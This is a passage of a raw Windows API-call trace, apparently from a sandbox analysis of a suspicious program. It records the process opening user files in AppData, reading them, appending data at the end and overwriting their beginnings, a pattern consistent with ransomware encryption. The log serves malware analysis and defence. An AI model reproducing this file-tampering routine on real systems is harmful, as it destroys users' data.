lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3130B1871A126520A8C47861EFE3ED4D", lpUsedDefaultChar=0x0) returned 32 [0183.575] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x2e9f2bc*=0xdc, lpOverlapped=0x0) returned 1 [0183.576] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.576] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x664, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x664, lpOverlapped=0x0) returned 1 [0183.576] CloseHandle (hObject=0x1cc) returned 1 [0183.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xf4 [0183.577] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.577] ReleaseMutex (hMutex=0x168) returned 1 [0183.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="696F3DE637E6DE85B458996D49D759AD", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0183.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="696F3DE637E6DE85B458996D49D759AD", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="696F3DE637E6DE85B458996D49D759AD", lpUsedDefaultChar=0x0) returned 32 [0183.578] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xf4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xf4, lpOverlapped=0x0) returned 1 [0183.579] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.579] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x67c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2e9f2d0*=0x67c, lpOverlapped=0x0) returned 1 [0183.579] CloseHandle (hObject=0x1cc) returned 1 [0183.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x182 [0183.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.581] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.581] ReleaseMutex (hMutex=0x168) returned 1 [0183.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpUsedDefaultChar=0x0) returned 65 [0183.581] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x182, lpOverlapped=0x0) returned 1 [0183.583] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.583] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0183.583] CloseHandle (hObject=0x1cc) returned 1 [0183.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x182 [0183.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.584] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.584] ReleaseMutex (hMutex=0x168) returned 1 [0183.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpUsedDefaultChar=0x0) returned 65 [0183.585] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x182, lpOverlapped=0x0) returned 1 [0183.586] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.586] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0183.587] CloseHandle (hObject=0x1cc) returned 1 [0183.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.588] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.588] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x186 [0183.588] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.588] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.588] ReleaseMutex (hMutex=0x168) returned 1 [0183.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpUsedDefaultChar=0x0) returned 65 [0183.589] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x186, lpOverlapped=0x0) returned 1 [0183.590] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.590] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x70e, lpOverlapped=0x0) returned 1 [0183.591] CloseHandle (hObject=0x1cc) returned 1 [0183.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.592] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.592] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x204 [0183.592] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.592] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.592] ReleaseMutex (hMutex=0x168) returned 1 [0183.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpUsedDefaultChar=0x0) returned 65 [0183.593] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x204, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x204, lpOverlapped=0x0) returned 1 [0184.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0184.423] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x78c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x78c, lpOverlapped=0x0) returned 1 [0186.250] CloseHandle (hObject=0x1cc) returned 1 [0186.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0186.936] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0186.936] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a0 [0186.936] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0186.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0186.937] ReleaseMutex (hMutex=0x168) returned 1 [0186.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0186.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpUsedDefaultChar=0x0) returned 65 [0186.937] ReadFile (in: hFile=0x1cc, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a0, lpOverlapped=0x0) returned 1 [0186.938] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0186.938] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x728, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x728, lpOverlapped=0x0) returned 1 [0187.139] CloseHandle (hObject=0x1cc) returned 1 [0187.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8F88wZ7CtzDstKhOqW-u.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\8f88wz7ctzdstkhoqw-u.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xabd9 [0187.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.140] ReleaseMutex (hMutex=0x168) returned 1 [0187.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8F88wZ7CtzDstKhOqW-u.mp4", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0187.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8F88wZ7CtzDstKhOqW-u.mp4", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8F88wZ7CtzDstKhOqW-u.mp4", lpUsedDefaultChar=0x0) returned 24 [0187.140] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0187.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9bd9 [0187.142] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9bd9 [0187.142] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.143] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.143] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0187.143] CloseHandle (hObject=0x1cc) returned 1 [0187.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Cml62EIQ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cml62eiq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.145] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x392e [0187.145] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.145] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.145] ReleaseMutex (hMutex=0x168) returned 1 [0187.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cml62EIQ.gif", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cml62EIQ.gif", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cml62EIQ.gif", lpUsedDefaultChar=0x0) returned 12 [0187.145] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x292e [0187.146] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0187.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x292e [0187.147] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0187.147] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0187.147] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0187.147] CloseHandle (hObject=0x1cc) returned 1 [0187.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kZ82v-FlR5BH2izf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kz82v-flr5bh2izf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0187.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x437e [0187.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0187.148] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0187.148] ReleaseMutex (hMutex=0x168) returned 1 [0187.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kZ82v-FlR5BH2izf.mkv", cchWideChar=20, 